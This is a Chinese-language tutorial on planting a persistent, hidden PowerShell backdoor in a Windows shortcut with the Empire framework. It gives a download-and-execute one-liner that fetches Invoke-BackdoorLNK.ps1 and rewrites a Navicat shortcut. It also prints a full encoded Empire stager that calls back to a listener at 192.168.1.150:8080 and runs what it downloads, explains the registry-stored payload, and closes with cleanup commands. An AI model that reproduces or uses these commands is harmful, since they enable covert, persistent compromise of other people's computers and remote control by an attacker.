如何创建Powershell持久隐蔽后门

用户开机后每次运行特定的快捷方式文件时触发一段恶意的powershell 代码，原始应用程序仍然启动，原始图标保留，并且没有powershell.exe窗口弹出。

1.安装后门

这次需要用到powershell攻击框架Empire，使用Empire/data/module_source/persistence/Invoke-BackdoorLNK.ps1这个脚本

powershell-nop -exec bypass -c "IEX (New-ObjectNet.WebClient)
.DownloadString('https://github.com/
EmpireProject/Empire/raw/master/data/module_source/persi
stence/Invoke-BackdoorLNK.ps1');Invoke-BackdoorLNK-LNKPath 'C:ProgramDataMicrosoftWindowsStartMenuProgramsPrem
iumSoftNavicat PremiumNavicat Premium.lnk' -EncScript Base6
4编码"

-LNKPath是要利用的lnk的路径，每次打开这个lnk文件时都会执行原始的应用程序和 -EncScript后面的恶意powershell代码

先通过empire生成反弹的powershell代码

./empire 进入empire

输入listeners 进入监听界面设置好ip与端口

setHost http://192.168.1.150
set Port 8080

launcher 1 生成power shell代码

powershell.exe -NoP-sta -NonI -W Hidden -Enc
WwBTAFkAcwB0AGUAbQAuAE4AZQBUAC4A
UwBlAHIAdgBpAGMAZQBQAG8ASQBOAFQA
TQBhAE4AQQBnAGUAcgBdADoAOgBFAFgAU
ABlAEMAdAAxADAAMABDAE8AbgB0AEkATg
BVAGUAIAA9ACAAMAA7ACQAdwBDAD0ATg
BlAFcALQBPAGIAagBFAEMAdAAgAFMAeQBT
AHQARQBtAC4ATgBFAFQALgBXAEUAQgBDA
EwASQBFAE4AVAA7ACQAdQA9ACcATQBvAH
oAaQBsAGwAYQAvADUALgAwACAAKABXAG
kAbgBkAG8AdwBzACAATgBUACAANgAuADE
AOwAgAFcATwBXADYANAA7ACAAVAByAGkA
ZABlAG4AdAAvADcALgAwADsAIAByAHYAOg
AxADEALgAwACkAIABsAGkAawBlACAARwBlA
GMAawBvACcAOwAkAFcAQwAuAEgARQBhAE
QAZQBSAHMALgBBAGQARAAoACcAVQBzAG
UAcgAtAEEAZwBlAG4AdAAnACwAJAB1ACkA
OwAkAHcAQwAuAFAAUgBPAHgAeQAgAD0AI
ABbAFMAeQBzAFQARQBNAC4ATgBlAHQALg
BXAGUAQgBSAEUAcQBVAGUAUwB0AF0AOg
A6AEQARQBGAGEAdQBsAFQAVwBlAGIAUAB
SAE8AWAB5ADsAJAB3AEMALgBQAHIAbwBY
AFkALgBDAHIARQBEAGUAbgBUAGkAYQBsA
HMAIAA9ACAAWwBTAFkAUwBUAEUATQA
uAE4AZQB0AC4AQwBSAEUAZABFAE4AdABp
AEEAbABDAGEAYwBIAGUAXQA6ADoARABF
AGYAYQB1AGwAVABOAGUAVAB3AE8AUgBL
AEMAUgBFAGQARQBuAHQAaQBBAEwAUwA
7ACQASwA9ACcAZQAxADAAYQBkAGMAMwA
5ADQAOQBiAGEANQA5AGEAYgBiAGUANQA2
AGUAMAA1ADcAZgAyADAAZgA4ADgAMwBlA
CcAOwAkAGkAPQAwADsAWwBDAEgAYQByAF
sAXQBdACQAYgA9ACgAWwBjAGgAQQBSAFsA
XQBdACgAJAB3AGMALgBEAG8AdwBuAGwAT
wBhAEQAUwBUAFIAaQBOAGcAKAAiAGgAdA
B0AHAAOgAvAC8AMQA5ADIALgAxADYAOAA
uADEALgAxADUAMAA6ADgAMAA4ADAALwB
pAG4AZABlAHgALgBhAHMAcAAiACkAKQApA
HwAJQB7ACQAXwAtAGIAWABvAFIAJABrAFsA
JABJACsAKwAlACQASwAuAEwAZQBOAEcAdA
BIAF0AfQA7AEkARQBYACAAKAAkAGIALQBqA
G8ASQBuACcAJwApAA==

这里我们只复制 -Enc 后面的代码

然后执行

powershell -nop -execbypass -c "IEX (New-Ob
jectNet.WebClient).DownloadString('ht
tps://github.com/EmpireProject/Empire/ra
w/master/data/module_source/persistence/
Invoke-BackdoorLNK.ps1');Invoke-Backdoor
LNK-LNKPath 'C:ProgramDataMicrosoftW
indowsStartMenuProgramsPremiumSoftN
avicat PremiumNavicat Premium.lnk' -EncScrip
tWwBTAHkAUwB0AGUATQAuAE4A
RQBUAC4AUwBlAFIAVgBpAEMAZQBQAE8A
aQBuAHQATQBBAG4AYQBnAEUAUgBdADoA
OgBFAHgAUABlAEMAVAAxADAAMABDAE8ATg
BUAEkATgBVAEUAIAA9ACAAMAA7ACQAVwBj
AD0ATgBFAHcALQBPAEIAagBFAEMAVAAgAF
MAeQBzAFQAZQBNAC4ATgBFAFQALgBXAEU
AQgBDAGwASQBFAE4AdAA7ACQAdQA9ACcA
TQBvAHoAaQBsAGwAYQAvADUALgAwACAAK
ABXAGkAbgBkAG8AdwBzACAATgBUACAANgA
uADEAOwAgAFcATwBXADYANAA7ACAAVAByAGkA
ZABlAG4AdAAvADcALgAwADsAIAByAHYAOgAx
ADEALgAwACkAIABsAGkAawBlACAARwBlAGM
AawBvACcAOwAkAHcAYwAuAEgAZQBBAGQAR
QByAFMALgBBAGQAZAAoACcAVQBzAGUAcgAt
AEEAZwBlAG4AdAAnACwAJAB1ACkAOwAkAFc
AQwAuAFAAcgBvAHgAWQAgAD0AIABbAFMAeQBz
AFQARQBNAC4ATgBlAFQALgBXAGUAQgBSAEUA
cQB1AGUAUwB0AF0AOgA6AEQARQBmAEEAdQB
sAFQAVwBFAEIAUAByAE8AWABZADsAJAB3AEM
ALgBQAHIAbwBYAFkALgBDAHIAZQBEAEUAbgB0A
GkAQQBsAFMAIAA9ACAAWwBTAHkAUwBUAEUAT
QAuAE4AZQBUAC4AQwBSAEUARABlAE4AdA
BpAGEAbABDAGEAQwBIAGUAXQA6ADoARABFAE
YAQQB1AGwAdABOAGUAVAB3AE8AcgBLAEMAcgB
FAEQARQBuAFQAaQBBAGwAcwA7ACQASwA9ACcAZ
QAxADAAYQBkAGMAMwA5ADQAOQBiAGEANQA5A
GEAYgBiAGUANQA2AGUAMAA1ADcAZgAyADAAZgA
4ADgAMwBlACcAOwAkAGkAPQAwADsAWwBj
AEgAYQBSAFsAXQBdACQAQgA9ACgAWwBjAEgAQQBy
AFsAXQBdACgAJAB3AEMALgBEAE8AdwBuAEwAT
wBBAGQAUwBUAHIASQBuAGcAKAAiAGgAdAB0AH
AAOgAvAC8AMQA5ADIALgAxADYAOAAuADEALgAx
ADUAMAA6ADgAMAA4ADAALwBpAG4AZABlAHgAL
gBhAHMAcAAiACkAKQApAHwAJQB7ACQAXwAtAG
IAWABPAFIAJABLAFsAJABpACsAKwAlACQASwAu
AEwAZQBOAGcAdABoAF0AfQA7AEkARQB
YACAAKAAkAEIALQBqAG8AaQBOACcAJwApAA=="

看到以上界面就代表后门安装完成

当我们运行navicat快捷方式的同时可以看到powershell.exe已经悄悄的链接empire

2.实现原理

它会将原来快捷目标修改为powershell.exe的地址，并且利用powershell去运行navicat程序与恶意代码。

解密后的代码

[System.Diagnostics.Process]::Start('D:Navicat
Premiumnavicat.exe');IEX([Text.Encoding]::A
SCII.GetString([Convert]::FromBase64String((gp HKCU:SoftwareMicrosoftWindowsdebug).debug)))

点击快捷方式后先执行快捷方式原来链接的目标，然后在注册表读取HKCU:SoftwareMicrosoftWindowsdebug的值运行（后门安装时把执行的代码加密后放到了HKCU:SoftwareMicrosoftWindowsdebug里面）

3.后门的清除

执行以下命令清除后门

powershell -nop -execbypass -c "IEX (New-Ob
jectNet.WebClient).DownloadString('https:
//github.com/EmpireProject/Empire/raw/m
aster/data/module_source/persistence/Invok
e-BackdoorLNK.ps1');Invoke-BackdoorLNK-LN
KPath 'C:ProgramDataMicrosoftWindowsStartM
enuProgramsPremiumSoftNavicat Premium
Navicat Premium.lnk'Invoke-BackdoorLNK -LN
KPath 'C:ProgramDataMicrosoftWindowsStartMe
nuProgramsPremiumSoftNavicat PremiumN
avicat Premium.lnk' -CleanUp"